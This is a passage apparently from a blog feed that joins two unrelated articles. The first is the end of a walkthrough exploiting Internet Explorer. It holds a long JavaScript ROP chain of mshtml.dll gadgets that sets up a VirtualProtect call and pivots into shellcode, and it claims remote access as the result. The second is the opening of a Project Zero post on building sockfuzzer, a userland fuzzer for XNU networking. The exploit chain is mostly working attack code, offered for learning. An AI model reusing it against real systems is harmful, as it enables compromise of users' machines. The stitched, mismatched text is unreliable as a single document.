This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Designing sockfuzzer, a network syscall fuzzer for XNU

By: Ryan
22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling
ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

